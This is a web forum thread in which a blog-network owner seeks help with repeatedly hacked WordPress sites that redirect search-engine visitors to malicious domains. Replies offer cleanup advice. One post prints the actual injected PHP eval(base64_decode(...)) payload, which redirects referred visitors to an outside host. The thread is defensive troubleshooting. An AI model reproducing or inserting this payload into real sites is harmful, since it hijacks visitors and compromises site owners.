81 {{ upvoteCount | shortNum }}
81 {{ upvoteCount | shortNum }}

My Sites Have Been HACKED - Please HELP!!!!!!!!!!

by nik0 Banned
68 replies
  • SEO
    • |
All the sites that I host at Justhost have been hacked some time ago. The hosting restored a backup, replaced my root files multiple times, we changed all the passwords and the problem keeps coming back every single time.

Right now when I enter my site url directly in the adress bar of my browser I do end up on my site.

However when I Google my site and click on my sites from the search results I get redirected instead of ending up on my own sites.

From firefox I get redirected to: hxxp://404.wikaba.com/?said=3333g&q=

From Chrome I get redirected to: hxxp://404.wikaba.com/?said=3333g&q=

This time as well, 10 minutes ago I got redirected to another site as well named: http://zserty.lflink.com/main.php?page=588ec4e4ea3b00d8

Can anyone help me how to solve this cause the support has definitely no clue whatsoever this time.
#hacked #recently #sites
  • Profile picture of the author limestone614
    You don't really give a lot away, however in the past most intrusions into our sites have been caused by poorly made Wordpress Plugins or known vulnerabilities.

    Have you looked at the timbthumb exploit?

    It can be used to inject code into your site, Base64. They can then alter your htaccess file.
    Nasty stuff.

    It can cause the effect you are seeing.

    Are you using Wordpress, if so, update it, what about any themes? Do any of them use the timthumb feature, if so are they using the new, fixed version?

    Google is your friend, this has happened thousands of times.

    FYI, if you were with Hostgator, they would have likely fixed this issue for you.

    Good Luck.
    Signature
    The Best Organic Traffic Solutions.
    For yours, take the next step: Visit Safeserps
    .
    {{ DiscussionBoard.errors[6837037].message }}
  • Profile picture of the author WinsonYeung
    My website get hacked before too. You need to find someone who is good at IT and disable cpanel/whm login by country IP.

    Agree with "tony" about the hostgator part
    Signature
    [WSO of The Day] Discount How To Generate 172.56% Positive Return OR build your List for FREE!

    "Case Study: Discover You Can Make $1371.66 With A Simple Blog Post by Clicking Here"
    {{ DiscussionBoard.errors[6837116].message }}
  • Profile picture of the author Mike Anthony
    Bleh hate to hear about this because I have clients that just insist on everything being wordpress and doing the updates is quite a pain on sometimes hundreds of sites at a time.
    Signature

    {{ DiscussionBoard.errors[6837139].message }}
    • Profile picture of the author Michael Carlin
      Originally Posted by Mike Anthony View Post

      Bleh hate to hear about this because I have clients that just insist on everything being wordpress and doing the updates is quite a pain on sometimes hundreds of sites at a time.

      Managewp. I run 500 sites with them, so the $400 per month is well worth it. You can manage 5 sites for free to try it out, there's 3 different pricing points, so you can manage 100 sites for less than $100 on a cheaper package.

      It will sync up plugins (using other blogs to fetch the files to install them on new sites, for example). It lets you know when your webhost is down, does rankings once per week too.

      The only thing that is tricky, is creating plugin settings, you have to write your own php to do it, but it's a lot easier than going through 500 sites manually.
      Signature
      {{ DiscussionBoard.errors[6837886].message }}
      • Profile picture of the author Mike Anthony
        Originally Posted by Michael Carlin View Post

        Managewp. I run 500 sites with them, so the $400 per month is well worth it. You can manage 5 sites for free to try it out,
        Yeah Have used ManageWP from last year (beta tested it in fact), recommend and even included them in my network training class but since I now am and will be managing many other networks but my own its just not feasible to me. I am having my own system built
        Signature

        {{ DiscussionBoard.errors[6838319].message }}
  • Profile picture of the author nik0
    Banned
    Thanks someone else also just pointed me at hostgator and how they fix it in a second, but this bloody justhost says "It's not a hosting problem so buzz off", talking with a tech guy now on Skype who is logging in and he found tons of mallicious code in my footer and header files. Hope I can fix it soon :S
    {{ DiscussionBoard.errors[6837149].message }}
  • Profile picture of the author limestone614
    It's likely to be the reason I stick with Hostgator, I've had to sit for hours stripping chunks of Base 64 code that have been maliciously injected into my sites.

    Hours and hours of boring tedious sh*t.

    With Hostgator it "Live chat" - Explain the issue, go through security, wait 10 minutes, problem solved.

    They've cleaned 5 shared servers, each with 20 sites on them in 10 minutes.

    Awesome.
    Signature
    The Best Organic Traffic Solutions.
    For yours, take the next step: Visit Safeserps
    .
    {{ DiscussionBoard.errors[6837169].message }}
    • Profile picture of the author yukon
      Banned
      Originally Posted by limestone614 View Post

      It's likely to be the reason I stick with Hostgator, I've had to sit for hours stripping chunks of Base 64 code that have been maliciously injected into my sites.

      Hours and hours of boring tedious sh*t.

      With Hostgator it "Live chat" - Explain the issue, go through security, wait 10 minutes, problem solved.

      They've cleaned 5 shared servers, each with 20 sites on them in 10 minutes.

      Awesome.
      Yep, base64 code is always a sign of a hacked theme file.

      There's no legit reason for anyone to use base64 code inside a theme or plugin.
      {{ DiscussionBoard.errors[6837226].message }}
      • Profile picture of the author Mike Anthony
        Originally Posted by yukon View Post

        Yep, base64 code is always a sign of a hacked theme file.

        There's no legit reason for anyone to use base64 code inside a theme or plugin.
        Depends on what you mean by legit. base64 is used by some designers that want to make it harder for you to remove thwir copyright and links. Not always a hacking thing.
        Signature

        {{ DiscussionBoard.errors[6837282].message }}
        • Profile picture of the author yukon
          Banned
          Originally Posted by Mike Anthony View Post

          Depends on what you mean by legit. base64 is used by some designers that want to make it harder for you to remove thwir copyright and links. Not always a hacking thing.
          With thousands of WP themes available, no way should anyone need to run a theme that includes base64 code. IMO, it's not even an option to use those themes.

          The base64 can be decoded online (free tools), still, too much work/time wasted trying to figure out what they are hiding in the code.
          {{ DiscussionBoard.errors[6837362].message }}
  • Profile picture of the author yukon
    Banned
    It could be that you downloaded a theme that was hacked (before you ever downloaded the theme).

    A lot of free theme sites hack the themes just for backlinks, or in your case a redirect.
    {{ DiscussionBoard.errors[6837210].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by yukon View Post

      It could be that you downloaded a theme that was hacked (before you ever downloaded the theme).

      A lot of free theme sites hack the themes just for backlinks, or in your case a redirect.
      Thing is all 29 sites are hacked on this hosting, can a theme hack cause all the other sites that are on the same shared hosting plan also to get hacked?
      {{ DiscussionBoard.errors[6837215].message }}
      • Profile picture of the author yukon
        Banned
        Originally Posted by nik0 View Post

        Thing is all 29 sites are hacked on this hosting, can a theme hack cause all the other sites that are on the same shared hosting plan also to get hacked?
        I doubt 1 theme/plugin would take down all the sites, base64 (WP theme/plugin hack) is usually contained to the domain the theme is on.

        Did you look at any of the sites htaccess file for redirects? Download the file to your desktop & look at the code.
        {{ DiscussionBoard.errors[6837261].message }}
  • Profile picture of the author nik0
    Banned
    I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
    {{ DiscussionBoard.errors[6837212].message }}
    • Profile picture of the author Rian
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      Ouch, it is a huge responsibility you have then in managing your sites...
      {{ DiscussionBoard.errors[6837255].message }}
    • Profile picture of the author limestone614
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      As do I run a blog network, I have 30+ shared hosting plans with hostgator.

      In response to some other questions/points.

      Being exploited on 1 site on a shared hosting package can in fact not only infect all your other sites on that shared server, but also others on the same server that are not yours, depending on how the server is setup.

      Base64 code is used legitimately in some Plugins.

      If you do a search online you will find a small piece of code to save on your server, when run via a browser window it will list all the files on the server containing Base64 code.

      Then you can remove it manually or simply replace the infected files with known good ones.

      Each time I had been exploited via Base64 code it was injected via the timthumb exploit found in older versions of Timthumb.php.

      You should check that also, it is used by a lot of themes.


      .
      Signature
      The Best Organic Traffic Solutions.
      For yours, take the next step: Visit Safeserps
      .
      {{ DiscussionBoard.errors[6837763].message }}
    • Profile picture of the author Michael Carlin
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      I'm currently using around 90 hosting account, but only 2 with HG.

      I've been looking at another option, where I can buy 100 dedicated IPs for $130, all unique C class, many B and A class too.

      I can have this running on one dedicated server. The whole thing will cost me $350 (it's nice to have friends in the industry ) per month, for easy management of 100 network domains, or 200 if I want to double up the Ips but keep those 2 networks separate.

      So, I'm gonna give it ago, and maybe not always rely on a hundred hosting accounts.
      Signature
      {{ DiscussionBoard.errors[6837913].message }}
      • Profile picture of the author limestone614
        Originally Posted by Michael Carlin View Post

        I'm currently using around 90 hosting account, but only 2 with HG.

        So, I'm gonna give it ago, and maybe not always rely on a hundred hosting accounts.
        It sounds like a great idea, we use xMarkpro, which is a blog management interface, it need not be Wordpress, any type of site.

        Likewise it monitors plugins, themes and SERPS, plus more.
        Content, spinning, built in thesaurus, connection to various api's, the best spinner etc.

        Link tracking and mass alteration of links, banner adverts etc.

        It's a great system, but sure enough the hosting charges mount up.
        Signature
        The Best Organic Traffic Solutions.
        For yours, take the next step: Visit Safeserps
        .
        {{ DiscussionBoard.errors[6837944].message }}
  • Profile picture of the author yukon
    Banned
    OP, did you use the same theme/plugins on all 29 sites?
    {{ DiscussionBoard.errors[6837267].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by yukon View Post

      OP, did you use the same theme/plugins on all 29 sites?
      No I use different themes on all the sites, I only use 1 common link juice keeper plugin, but I also use that on my other hostings and never a problem with any of my sites so that can't be it I guess.

      Also there was nothing wrong with my .htaccess file.

      Only thing I worry about now if the same thing will happen next week again. Already struggling with this stuff for 3 weeks now.

      - 1st week, I got some weird blanc screen with just a few letters like KGH-SGS or something
      Solution: Hosting restored my root files from the WP installations

      - 2nd week, my complete FTP host was empty, ALL files were deleted
      Solution: Hosting restored a backup

      - 3rd week, all my sites redirect to malicious sites (right now while I made this post)
      Solution: Again changed passwords, removed mysql remote thing, restored a backup again

      But as said, I wonder how long it will last this time :S
      {{ DiscussionBoard.errors[6837309].message }}
  • Profile picture of the author NetBizOnline
    ohh sorry to hear that.why they do that?
    {{ DiscussionBoard.errors[6837277].message }}
  • Profile picture of the author nik0
    Banned
    Problem is solved now, I restored the old backup, but well the hoster did that some time ago as well and then later it was hacked again. I also deleted some remote Mysql user in my Cpanel and changed my hosting and ftp password (although I already did that 1 week ago). Let's see....
    {{ DiscussionBoard.errors[6837292].message }}
  • Profile picture of the author Mike Anthony
    Nik if you are using plugins on your network sites you can safely take them off. No need for any plugins on network sites.
    Signature

    {{ DiscussionBoard.errors[6837302].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by Mike Anthony View Post

      Nik if you are using plugins on your network sites you can safely take them off. No need for any plugins on network sites.
      Thing is I do need this linkjuice keeper plugin, but I don't think the risk is in that as all my other 200+ sites are fine.

      Also I use some different rating plugins, for my review sites so that it also looks like a review site, with stars and all. But those sites aren't affected either, they are on different hostings.

      Or it has to do with a previous employee that installed sites for me, or it has to do with some malicious theme that I downloaded somewhere that affected all my other sites as well on that hosting plan. I used to get nice niched themes for my guest post sites from all kind of sources so good chance I picked something up that way.
      {{ DiscussionBoard.errors[6837359].message }}
  • Profile picture of the author palms
    This is what often happens...

    1.) A trojan gets in your LOCAL machine.

    2.) This trojan scraps your FTP client for login userID/password info and sends it to the mothership.

    3.) The mothership uses the scraped login info to upload a base64-encoded javascript iframe to certain pages of all your sites that are listed in your FTP client, usually the index.php page.

    The reason this virus is so insidious is that webmasters try to attack the problem by either removing the javascript or restoring a back-up, but this will only fix the problem temporarily because the sites keep getting re-infected. Remember, the mothership has your FTP login info.

    The REAL problem is on the LOCAL machine. Clean the LOCAL machine first, then change all passwords to your sites.

    THEN remove the iframe javascript from the WP sites.
    {{ DiscussionBoard.errors[6837378].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by palms View Post

      This is what often happens...

      1.) A trojan gets in your LOCAL machine.

      2.) This trojan scraps your FTP client for login userID/password info and sends it to the mothership.

      3.) The mothership uses the scraped login info to upload a base64-encoded javascript iframe to certain pages of all your sites that are listed in your FTP client, usually the index.php page.

      The reason this virus is so insidious is that webmasters try to attack the problem by either removing the javascript or restoring a back-up, but this will only fix the problem temporarily because the sites keep getting re-infected. Remember, the mothership has your FTP login info.

      The REAL problem is on the LOCAL machine. Clean the LOCAL machine first, then change all passwords to your WP sites.

      THEN remove the iframe javascript from the WP sites.
      You would think they would've hacked my paypal and other accounts as well, yeah up until recently I was so stupid to save that data on my pc. Also it amazes me that my other hostings are all clear. Anyway definitely worth it to run another virus check and change everything once again. Just in case. Thanks!
      {{ DiscussionBoard.errors[6837401].message }}
      • Profile picture of the author nik0
        Banned
        Not sure if it's useful to anyone but this is what we found in the header/ footer and more files:

        <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID cuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsK aWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaX N0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2 dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9y IHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVy LCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW 4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBv bi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9y IHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD 8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIu Y29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

        I've seen this kind of code in PAID themes as well btw, to protect them from removing the footer links. Oh yeah Mike just said that as well. The site where we got this code from wasn't a paid theme site.
        {{ DiscussionBoard.errors[6837408].message }}
        • Profile picture of the author yukon
          Banned
          Originally Posted by nik0 View Post

          Not sure if it's useful to anyone but this is what we found in the header/ footer and more files:

          <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID cuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsK aWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaX N0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2 dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9y IHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVy LCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW 4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBv bi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9y IHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD 8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIu Y29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

          I've seen this kind of code in PAID themes as well btw, to protect them from removing the footer links. Oh yeah Mike just said that as well. The site where we got this code from wasn't a paid theme site.





          Well, there's your answer.

          I had to post an image of the source code because the forum wouldn't allow the code to posted. Here is where you can decode any other base64 code you have.
          hxxp://www.base64decode.org/
          Chances are they've rigged the theme to not work If the base64 code is removed.

          Like I said before, get rid of anything that includes base64, find another theme/plugin, whatever...

          Here is the base64 code decoded.




          {{ DiscussionBoard.errors[6838228].message }}
          • Profile picture of the author Mike Anthony
            Originally Posted by nik0 View Post

            Thing is I do need this linkjuice keeper plugin, but I don't think the risk is in that as all my other 200+ sites are fine.
            Do you get this off site because the one I saw on wordpress's site with that name has not been updated in two years.


            Originally Posted by yukon View Post

            With thousands of WP themes available, no way should anyone need to run a theme that includes base64 code. IMO, it's not even an option to use those themes..
            Wasn't speaking to whether you should use them but to the fact that not everyone that puts those in does it for hacking reasons. It can be overcome of course but some designers put them in - also a very wide practice on sponsored themes neither of which are trying to do any hacking.
            Signature

            {{ DiscussionBoard.errors[6838282].message }}
            • Profile picture of the author yukon
              Banned
              Originally Posted by Mike Anthony View Post

              Wasn't speaking to whether you should use them but to the fact that not everyone that puts those in does it for hacking reasons. It can be overcome of course but some designers put them in - also a very wide practice on sponsored themes neither of which are trying to do any hacking.
              I see what your saying, but I have a yes/no rule for anything free or paid:

              Does it include base64 code?
              • Yes, dump it.
              • No, keep it.

              I don't have enough time to play games with themes/plugins, If the author is that insecure that they have to hide code, they can keep the theme/plugin, I don't need it.

              Also, If base64 code was in a paid theme, I would demand a refund & move on to the next seller without base64 code.
              {{ DiscussionBoard.errors[6838336].message }}
              • Profile picture of the author Mike Anthony
                Agree with you on all counts even more on paid themes.


                Originally Posted by yukon View Post

                I see what your saying, but I have a yes/no rule for anything free or paid:

                Does it include base64 code?
                • Yes, dump it.
                • No, keep it.

                I don't have enough time to play games with themes/plugins, If the author is that insecure that they have to hide code, they can keep the theme/plugin, I don't need it.

                Also, If base64 code was in a paid theme, I would demand a refund & move on to the next seller.
                Signature

                {{ DiscussionBoard.errors[6838354].message }}
            • Profile picture of the author nik0
              Banned
              Originally Posted by Mike Anthony View Post

              Do you get this off site because the one I saw on wordpress's site with that name has not been updated in two years.
              Not sure where I got it from but it's not that complicated what it does so I don't think it requires any updates, at least hope so.
              {{ DiscussionBoard.errors[6838404].message }}
  • Profile picture of the author palms
    It happened to me when I bought a new PC and was setting it up. I forgot to set Norton to scan incoming emails for about the first 10 minutes I had my computer running and bang, I got hit. I didn't know it until Google started throwing up red virus warning screens on all my sites.

    Hostgator knew exactly what the problem was and fixed it within 15 minutes of my call. They also sent me a detailed email of exactly what they found, what was removed, and most importantly HOW the whole thing happened. Hostgator is a great host.

    Good luck with your sites.
    {{ DiscussionBoard.errors[6837559].message }}
  • Profile picture of the author BAC
    Your website's main page (index page) is hacked you need to upload and overwrite it from your backup.

    Thanks,
    VGM
    Signature

    Get Content Targeted Super Real Traffic to Boost your Adsense Revenue!

    {{ DiscussionBoard.errors[6837586].message }}
  • Profile picture of the author nik0
    Banned
    Right now I'm installing a plugin on all my sites that checks for the timthumb indeed.

    Also a virus scanner plugin that finds many dangerous codes in the themes, actually I think this virus plugin indicates too much as dangerous but well better then safe be sorry, I try to only use themes that have zero errors cause what can be innocent today might be something that they exploit tomorrow.

    I also have a WP firewall plugin but that might get a bit nasty as we have to fill in our IP adress there but my VA's need access to the sites and with dynamic IP's it gets too hard.

    Thanks for all the suggestions, plenty of work to do now pffff
    {{ DiscussionBoard.errors[6837813].message }}
  • Profile picture of the author HostWind
    nik0, it looked like the insert checked for a few old browsers and certain referers, if found it would redirect the user.

    Glad to hear its all fixed up!
    Signature
    HostWinds
    Inexpensive Web Hosting
    Unlimited Web Hosting
    {{ DiscussionBoard.errors[6837977].message }}
  • Profile picture of the author nik0
    Banned
    Thanks Hostwind.

    I'm a bit old fashioned with my network, right now 250 sites and counting and we do all manually. It's not that big of a deal though as we setup each site differently and customize it a bit, it's hard to do that with tools. For the rest we only post unique content on each of them so my VA's just have to login a bit more often then normal, find a nice related picture for the blog post. Right now I do miss a management console but well it's a one time thing I guess. Let's hope this doesn't happen again.
    {{ DiscussionBoard.errors[6838168].message }}
    • Profile picture of the author WinsonYeung
      Originally Posted by nik0 View Post

      Thanks Hostwind.

      I'm a bit old fashioned with my network, right now 250 sites and counting and we do all manually. It's not that big of a deal though as we setup each site differently and customize it a bit, it's hard to do that with tools. For the rest we only post unique content on each of them so my VA's just have to login a bit more often then normal, find a nice related picture for the blog post. Right now I do miss a management console but well it's a one time thing I guess. Let's hope this doesn't happen again.
      You mention about VA. Tell your VA to scan their PC too!
      Signature
      [WSO of The Day] Discount How To Generate 172.56% Positive Return OR build your List for FREE!

      "Case Study: Discover You Can Make $1371.66 With A Simple Blog Post by Clicking Here"
      {{ DiscussionBoard.errors[6839924].message }}
      • Profile picture of the author nik0
        Banned
        Originally Posted by WinsonYeung View Post

        You mention about VA. Tell your VA to scan their PC too!
        Just did yeah
        {{ DiscussionBoard.errors[6842369].message }}
  • Profile picture of the author Dentist
    We had the exact same problem with one of our authority websites. It drove me crazy. I don't remember the name of the malware but fixing it involved manually removing it from each page and it had copied itself everywhere (over 1000 instances). The same effect (clicking on the search result redirected us to another page). Anyhow, we ended up the paid version of sucuri and they fixed it pretty fast. No affiliation with Sucuri (and they have their own problems too) but I do recommend them because we lost so much leads for a while before they fixed it....
    {{ DiscussionBoard.errors[6838305].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by Dentist View Post

      We had the exact same problem with one of our authority websites. It drove me crazy. I don't remember the name of the malware but fixing it involved manually removing it from each page and it had copied itself everywhere (over 1000 instances). The same effect (clicking on the search result redirected us to another page). Anyhow, we ended up the paid version of sucuri and they fixed it pretty fast. No affiliation with Sucuri (and they have their own problems too) but I do recommend them because we lost so much leads for a while before they fixed it....
      I'll definitely look into Sucuri or any paid thing of that kind. It can get pretty expensive and it's not that you Google your own site on daily base to find out that it's hacked. Definitely something that people should do once in a while.
      {{ DiscussionBoard.errors[6838433].message }}
      • Profile picture of the author Dentist
        Originally Posted by nik0 View Post

        I'll definitely look into Sucuri or any paid thing of that kind. It can get pretty expensive and it's not that you Google your own site on daily base to find out that it's hacked. Definitely something that people should do once in a while.
        The website I am referring to was generating S40K/month worth of traffic from SEO (according to SEMRush compared to if we purchased the traffic from PPC) at the time. We got the annual removal package for one website (I think it was $89 annually at the time). For us, compared to the time we lost contemplating what to do and the opportunity loss of leads was worth it. Obviously for you it goes back to the opportunity loss of each website. BTW, I think you can ask them to take a look at your website/websites for free (plus their automatic monitoring tool is free) and ask them if they can fix it/them beforehand. That way you are safe if it didn't work out.
        {{ DiscussionBoard.errors[6839427].message }}
  • Profile picture of the author Dentist
    BTW, I forgot to mention. We think we got it from our webhosting. Somehow they have a backdoor. We communicated it to them and they denied it but nevertheless that was our conclusion...
    If you have all of the websites you have on one webhosting got it, there is a high chance there...
    {{ DiscussionBoard.errors[6840000].message }}
  • Profile picture of the author nik0
    Banned
    This is truelly absurd.

    Last night I changed all my passwords:

    - Cpanel
    - Disabled FTP access
    - Cleaned up all the sites, new themes, virus scan, timthumb checker

    And today all sites at that hosting are full of base64code again. :S

    EDIT: Hack code removed
    {{ DiscussionBoard.errors[6841844].message }}
  • Profile picture of the author nik0
    Banned
    I just did a website scan at sucuri:


    Security report (No threats found):
    Blacklisted: No
    Malware: No
    Malicious javascript: No
    Malicious iFrames: No
    Drive-By Downloads: No
    Anomaly detection: No
    IE-only attacks: No
    Suspicious redirections: No
    Spam: No

    But my code is fully infected with this 64code base, and they only redirect users when they visit my site from a search engine, not when I type in the URL directly in my browser so the tool can't find anything for that reason. How sick is that. I will contact them to see if they can help.

    Almost $700 to fix 29 sites, then they clean it up, like I can do also with 1 click to restore all, and the next day it's back :S
    {{ DiscussionBoard.errors[6842384].message }}
  • Profile picture of the author mosthost
    What's your budget to get this fixed? This is a common PHP injection.
    {{ DiscussionBoard.errors[6842388].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by mosthost View Post

      What's your budget to get this fixed? This is a common PHP injection.
      I don't want to spend a fortune on it. Actually I'm thinking about downloading all posts manually, save them in a txt file, and then move all the sh*t away from Justhost, what a provider. Just rehost all of my sites, few days work for my VA's and then I'm done for less then $100,-

      You know what chat support said? They say that it's a Google cache problem and that I should contact them, really wtf.

      Can't even restore a normal backup anymore.

      At some sites I get a blanc screen and this message:

      BY KSG-CREW


      Plenty of Google results when you type that in :S
      {{ DiscussionBoard.errors[6842613].message }}
      • Profile picture of the author Mike Anthony
        Originally Posted by nik0 View Post

        I don't want to spend a fortune on it. Actually I'm thinking about downloading all posts manually, save them in a txt file, and then move all the sh*t away from Justhost, what a provider. Just rehost all of my sites, few days work for my VA's and then I'm done for less then $100,-

        I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
        Signature

        {{ DiscussionBoard.errors[6843246].message }}
        • Profile picture of the author nik0
          Banned
          Originally Posted by Mike Anthony View Post

          I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
          I just used the content export function, took me 30 minutes. Now I have to re-install all sites again and make them look beautiful again, won't be done in a few hours
          {{ DiscussionBoard.errors[6851366].message }}
        • Profile picture of the author Michael Carlin
          Originally Posted by Mike Anthony View Post

          I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
          The post content might be easier to extract through the MYSQL database. Of course, that can be (and almost certainly is) infected too, but you can extract just the posts/pages content, and not all the WP tables.

          Originally Posted by Oranges View Post

          Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
          Yeah, that's the problem with this new script that's been sold everywhere.
          Signature
          {{ DiscussionBoard.errors[6851407].message }}
  • Profile picture of the author nerbie
    If I'm the one to handle this issue I would revert back all theme to wordpress default theme. It doesn't matter if I'm going to login to all of it one by one. This will preserve google ranking since you dont need to put the site down and prevent google to recognize your domain as harmful especially if there is a malware on the wordpress theme. Secondly, I would remove manually starting with the most important website till to the least important. IN few hours you can remove that malicious code then put back your theme. You may also check .htaccess of each domain to remove the redirection if you see it there.

    By the way I also do host my personal 50+ wordpress domain names scattered to 3 dedicated servers and able to do such within few hours. The only difference I access directly to the server boxes that would make it easier for me.
    {{ DiscussionBoard.errors[6842492].message }}
    • Profile picture of the author tech84
      Sometimes, the problems lies with the hosting, they may have security vulnerabilities that even though you clean up your codes, on the server side, they would still continue to be hacked.

      How did I jump into this conclusion? From experience, once I was using the services of one super shitty *#&&*% host (I still wonder why their business is still running even though the whole internet know how bad their services are.....*still no gonna name them lol)

      All the sites (running wordpress) in their whole database got hacked, no apologies, no we'll fix this, no we'll upgrade our servers to prevent this in the future, no we'll improve our security, NO F*****g backups provided (yes that's TRUE, they even blamed us for not having a copy of the most recent backup of our sites).


      Sorry if I seem to be ranting here, just really wanted to say that the problem could be from your hosting.
      {{ DiscussionBoard.errors[6842565].message }}
  • Profile picture of the author nik0
    Banned
    I just think I found the source. my wp-cron.php shows the malicous code as well:


    EDIT: Malicious code removed, we don't want to make hackers any smarter
    {{ DiscussionBoard.errors[6842583].message }}
  • Profile picture of the author Martin Pupke
    Whenever anything of your is hacked a good step is to return your computer to "factory condition". Make sure you back up your data first.
    Signature

    "The first principle is that you must not fool yourself - and you are the easiest person to fool" - Richard Feynman

    {{ DiscussionBoard.errors[6842681].message }}
  • Profile picture of the author Oranges
    It is definitely an issue from Justhost's side. I'd give it a shot by first taking the XML database backup wp-admin>>tools>>export and then delete all the files and mysql DB and then do a new clean install by using fantastico or manually and then restore the site by importing XML database that you have exported. That way all your files and mysql DB will be new and clean. Give it a try, may be that will work. Good luck
    Signature

    {{ DiscussionBoard.errors[6842751].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by Oranges View Post

      It is definitely an issue from Justhost's side. I'd give it a shot by first taking the XML database backup wp-admin>>tools>>export and then delete all the files and mysql DB and then do a new clean install by using fantastico or manually and then restore the site by importing XML database that you have exported. That way all your files and mysql DB will be new and clean. Give it a try, may be that will work. Good luck
      Thanks a lot, I was just copy pasting every single post to Notepad LOL
      {{ DiscussionBoard.errors[6842759].message }}
      • Profile picture of the author Oranges
        Originally Posted by nik0 View Post

        Thanks a lot, I was just copy pasting every single post to Notepad LOL
